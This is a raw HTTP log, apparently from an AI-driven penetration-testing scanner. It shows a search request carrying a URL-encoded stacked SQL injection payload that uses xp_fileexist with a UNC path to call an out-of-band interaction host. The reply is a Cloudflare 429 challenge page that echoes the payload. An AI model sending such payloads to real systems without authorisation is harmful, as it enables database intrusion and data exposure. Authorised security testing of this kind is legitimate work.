REQUEST:
GET https://my.myfirst.tech/search?name=%27%3B%20DECLARE%20%40q%20VARCHAR%2899%29%3B%20SET%20%40q%3D%27%5C%5Ch0cqg45t8jh21623dc0zypg2g2vx1775v.oast.fun%5Ca%27%3B%20EXEC%20master.dbo.xp_fileexist%20%40q%3B--%20-
User-Agent: pentest-ai/0.11 (+https://pentestai.xyz)



RESPONSE:
HTTP 429
Date: Fri, 17 Jul 2026 09:39:16 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 9872
Connection: close
Accept-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cf-Mitigated: challenge
X-Frame-Options: SAMEORIGIN
Server: cloudflare
Critical-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=(),xr-spatial-tracking=*
Referrer-Policy: same-origin
Server-Timing: chlray;desc="a1c8474cbc30a110"
X-Content-Type-Options: nosniff
Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=U7zoO1T2I1cXHqRIImCf4Y31wM%2BxXZdNeTj3Bt75%2BBf7%2BOP1Pj6EoNujhusFNYcgs2NOMlm4Qa8Wo7sV4s7SKSI%2BIKlgYy%2FxAv149MMF9Ueo0v48%2Bt0Lf06cUQ0v65%2BJHA%3D%3D"}]}
Nel: {"report_to":"cf-nel","success_fraction":0.01,"max_age":604800}
X-XSS-Protection: 1; mode=block
X-Permitted-Cross-Domain-Policies: none
X-Download-Options: noopen
CF-RAY: a1c8474cbc30a110-SIN
alt-svc: h3=":443"; ma=86400

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Verifying your connection...</title>

    <style type="text/css">
        *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#FFF;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}svg{width:40%}a:hover{border-bottom-color:#A9A9A9}h1{font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;display:flex;align-items:start;margin-bottom:1.6rem;margin:auto}.action{border:1px solid #A9A9A9;padding:1.2rem 2.5rem;border-radius:6px;text-decoration:none;margin-top:1.6rem;display:inline-block;font-size:1.5rem;transition:border-color 0.2s ease-in}.action:hover{border-color:#000}@media all and (min-width:500px){.text-container--main{align-items:start}.page{padding:7.5rem 10.5rem}}
    </style>
<meta http-equiv="refresh" content="360"></head>

<body>
  <div class="page">
    <div class="text-container text-container--main">
      <div>
        <h1 data-i18n="content-title">Your connection needs to be verified before you can proceed</h1>
        <div class="cf-injected-html"><div class="main-wrapper" role="main"><div class="main-content"><noscript><div class="h2"><span id="challenge-error-text">Enable JavaScript and cookies to continue</span></div></noscript></div></div><script>(function(){window._cf_chl_opt = {cFPWv: 'b',cH: 'a5.bbmlGLk.haNIS.IJ2cJUFswZ_OEulrgHPod0A_PE-1784281156-1.2.1.1-LFVuL1c8nabEx.OLckvKTX733TPD19xEnRpN.2dLbmGzC9rcA3S.9kfGD077JAUV',cITimeS: '1784281156',cRay: 'a1c8474cbc30a110',cTplB: '0',cTplC:1,cTplO:0,cTplV:5,cType: 'managed',cUPMDTk:"/search?name=%27%3B+DECLARE+%40q+VARCHAR%2899%29%3B+SET+%40q%3D%27%5C%5Ch0cqg45t8jh21623dc0zypg2g2vx1775v.oast.fun%5Ca%27%3B+EXEC+master.dbo.xp_fileexist+%40q%3B--+-\u0026__cf_chl_tk=834ocuCHgnS0LOE4Dnz4PxTaRIdwCO9vR61COOKVmrs-1784281156-1.0.1.1-NfjWbofUIXrCtI8RMemDYEkI8A4tG9x6_4ogGV9H0Q8",cvId: '3',cZone: 'my.myfirst.tech',fa:"/search?name=%27%3B+DECLARE+%40q+VARCHAR%2899%29%3B+SET+%40q%3D%27%5C%5Ch0cqg45t8jh21623dc0zypg2g2vx1775v.oast.fun%5Ca%27%3B+EXEC+master.dbo.xp_fileexist+%40q%3B--+-\u0026__cf_chl_f_tk=834ocuCHgnS0LOE4Dnz4PxTaRIdwCO9vR61COOKVmrs-1784281156-1.0.1.1-NfjWbofUIXrCtI8RMemDYEkI8A4tG9x6_4ogGV9H0Q8",md: 'af76BtXK.47DAY4WpeEEfO5kw7sSQbLoSvA8D8ANpKE-1784281156-1.2.1.1-hE.WV1HLv1GPedZmt6PN0Bzkw6hn0eirvHJdmEidVXfHTi4SXNR9Gb6sawy5py1d9KfN_0dumJ1LWRAxnYD9XaV6htKno9FuYWGCT4QW3PjqA09saBm9lxakYptqVq.BVMdcB6PPhNzBMCY2o42Jf0N4BzU6wutSSWYMfK0IL0huUoRZvHWVVMM0xu.Zn37_eg5fPVSQN3fJJq.7DuBkCtigsUc3pWyoJfej6H65gGbYCStriMYEZ6smBMlnuyt2W7q7AnM6cdCg3tX014lbgT525_WOMgaxi48Au9xeCwcgt7FocZc_2rCG46S3rS0ic7q6DmF8zfViRr9wjpTyq8dGcEFiRO6mqHYAA44WGI7hWwjRKFLgYy.I3HPSnwq7yWXYUZq9r3RIVRrJaT99Bwy7EemFHHAfZfBLoiD5czhm4aQiAZzoxy9M39XUjlt2fpXeL8xu9kXbLw5KUPzROdicyqwqh5oySta6JxNsnL2aPFVzhWhJLFO3z8HrU4QoX7lW.Fl7dy8s.Rc5fSvq3vctv8nZmVEMdQo97n2sQqvKyVOGS1y4_mNRgOIkiHkdU9hizmzW2i1NI.hhUWVrnDqhmPIe9Vxwuezsv1AcLUO9919Q9.ij8wo9bmPLk4gfc1rTUux_andtHkKnhps5KnAIYVF9quLKWa_CL6xuCaWi1Mg1jeJzjnG06_iabzWWaUoBBLF9PtseuzxXls3AOGgRTh59tB4b9eHG_VIF9Ydlt1xbaXjhWtnL2KhIYttXoxt_.3nIhqrw5gQkyrmiknmYrSmqOT4HkEeqMFSmzZqNqQr3fG8fbUjmYEodx4P58qp3hE5yO3CBspIgm6RjkRw1.dbFNja6LmSk12K.310Du_URYb6yFElBzq62lvfPKsaEQ0D8bHYhJ2FPJlyNP5Uz6xI9FahBkRhHt7nh0QLp9pi4o5Fy12bVNEB5G1UJ7MRW4waeK0WbZeXRL3Oh5O0d9Cl0u9rPD.Tk6k6.1xZsOq_VlZz9tNrh4sChins3K5S0g.sjaPEnYGxTWGz3ECzAUqBTk_MsREed37hvTjh3qM9fLHqVEaeXzi6vj2QMXUT__nLl4Zwl7Ntf0Y_cWUDn0yYVWZiayUoNTFAO7SsYTcibx6et6A9tbnJ9Urs7eCgAtiF3k_WdZGKpBBs3TdyEAK0gB0GhNGF9.X0P6q.CvDL2pKHH45hI6CC5Yw8_BI5V4GLpAEc2Uk_BO7YfLaz75Q7fyj7HHpaz1zqYYRRj6wLZ6X8OIIrDNDOKGO2LuUSadHRm2SgCl5DGEHpuaB09rO67StuQh.jWEpG0hFbiCShpEKJZJf9qwfhgtD0pOPmul0MjRAHOcbdFDEodDw',mdrd: '4o6lDjYqGzNwNG.TlklJek2HHx0EhxaEQwUZPt0fXVw-1784281156-1.2.1.1-0PAVKispYE9EwOVGqfIsuhJ5Wr5bPYn7JJdjwzc5qdEkmkDeFj5cYIAzURcMd3lH3bOqiZ6SAbE9cKzENYzaHecjdDbD7iBVKPGFnRwyu9nJTaTR.RMUMMbTJKvEMVYNqsENxYeTQ8M8AgkMH7bNIBvFxxCD66WtkDT6CfcVYtYoI._bjDJXaqEFjIlApke_RqxdvbeXqhSwuNUiDMLSS4myDy7LTcuIBzf6GKLk4ShnGKO6fcAd1OqPb4PRNi.D',};var a = document.createElement('script');a.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=a1c8474cbc30a110';window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;if (window.history && window.history.replaceState) {var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;history.replaceState(null, null,"/search?name=%27%3B+DECLARE+%40q+VARCHAR%2899%29%3B+SET+%40q%3D%27%5C%5Ch0cqg45t8jh21623dc0zypg2g2vx1775v.oast.fun%5Ca%27%3B+EXEC+master.dbo.xp_fileexist+%40q%3B--+-\u0026__cf_chl_rt_tk=834ocuCHgnS0LOE4Dnz4PxTaRIdwCO9vR61COOKVmrs-1784281156-1.0.1.1-NfjWbofUIXrCtI8RMemDYEkI8A4tG9x6_4ogGV9H0Q8"+ window._cf_chl_opt.cOgUHash);a.onload = function() {history.replaceState(null, null, ogU);}}document.getElementsByTagName('head')[0].appendChild(a);}());</script></div>
      </div>
    </div>
  </div>

  <script>
    var t = {
  "cs": {
    "title": "Vaše připojení se ověřuje...",
    "content-title": "Než budete moct pokračovat, je nutné ověřit vaše připojení"
  },
  "da": {
    "title": "Bekræfter din forbindelse ...",
    "content-title": "Din forbindelse skal bekræftes, før du kan fortsætte"
  },
  "de": {
    "title": "Deine Verbindung wird verifiziert ...",
    "content-title": "Deine Verbindung muss verifiziert werden, bevor du fortfahren kannst"
  },
  "en": {
    "title": "Verifying your connection...",
    "content-title": "Your connection needs to be verified before you can proceed"
  },
  "es": {
    "title": "Verificando la conexión...",
    "content-title": "Se debe verificar tu conexión antes de poder continuar"
  },
  "fi": {
    "title": "Yhteyttäsi todennetaan...",
    "content-title": "Yhteytesi on todennettava ennen kuin voit jatkaa"
  },
  "fr": {
    "title": "Connexion en cours de vérification...",
    "content-title": "Votre connexion doit être vérifiée avant que vous puissiez continuer"
  },
  "hi": {
    "title": "आपका कनेक्शन वेरिफ़ाई हो रहा है...",
    "content-title": "इससे पहले कि आप आगे बढ़ें आपके कनेक्शन को वेरिफ़ाई करना होगा"
  },
  "it": {
    "title": "Verifica connessione...",
    "content-title": "È necessario verificare la tua connessione prima di procedere"
  },
  "ja": {
    "title": "接続を確認しています...",
    "content-title": "続行するには接続の確認が必要です"
  },
  "ko": {
    "title": "연결 확인 중...",
    "content-title": "계속 진행하려면 연결을 확인해야 합니다."
  },
  "ms": {
    "title": "Mengesahkan sambungan anda...",
    "content-title": "Sambungan anda perlu disahkan sebelum anda boleh meneruskan"
  },
  "nb": {
    "title": "Bekreft tilkoblingen din …",
    "content-title": "Tilkoblingen din må bekreftes før du kan fortsette"
  },
  "nl": {
    "title": "Je verbinding verifiëren...",
    "content-title": "Verifieer eerst je verbinding voordat je doorgaat"
  },
  "pl": {
    "title": "Weryfikowanie połączenia...",
    "content-title": "Możesz kontynuować, dopiero gdy połączenie zostanie zweryfikowane"
  },
  "pt-BR": {
    "title": "Verificando a conexão...",
    "content-title": "A conexão precisa ser verificada para você prosseguir"
  },
  "pt-PT": {
    "title": "A verificar a sua ligação...",
    "content-title": "A sua ligação tem de ser verificada antes de prosseguir"
  },
  "sv": {
    "title": "Verifierar din anslutning ...",
    "content-title": "Din anslutning måste verifieras innan du kan fortsätta"
  },
  "th": {
    "title": "ตรวจสอบยืนยันการเชื่อมต่อของคุณ...",
    "content-title": "การเชื่อมต่อของคุณต้องได้รับการตรวจสอบยืนยันก่อนจึงจะดำเนินการต่อได้"
  },
  "tr": {
    "title": "Bağlantınız doğrulanıyor...",
    "content-title": "Devam etmeden önce bağlantınızın doğrulanması gerekir."
  },
  "vi": {
    "title": "Đang xác minh kết nối...",
    "content-title": "Bạn cần xác minh kết nối để có thế tiếp tục"
  },
  "zh-CN": {
    "title": "正在验证您的连接...",
    "content-title": "您的连接需要经过验证然后您才能继续操作"
  },
  "zh-TW": {
    "title": "正在驗證連線...",
    "content-title": "您必須先驗證連線才能繼續"
  }
};
    var language = navigator.languages && navigator.languages[0] || // Chrome / Firefox
      navigator.language ||   // All browsers
      navigator.userLanguage || // IE <= 10
      "en";
    language = language.split("-")[0]; // Strip country code
    translations = t[language] || t["en"];
    // Replace content on screen
    for (var id in translations) {
      target = document.querySelector("[data-i18n=" + id + "]");
      if (target != undefined) {
        target.innerHTML = translations[id];
      }
    }
    // Replace title tage
    document.title = translations["title"];
    // Replace language tag
    if (t[language]) { document.getElementsByTagName('html')[0].setAttribute('lang', language); };
  </script>
</body>
</html>
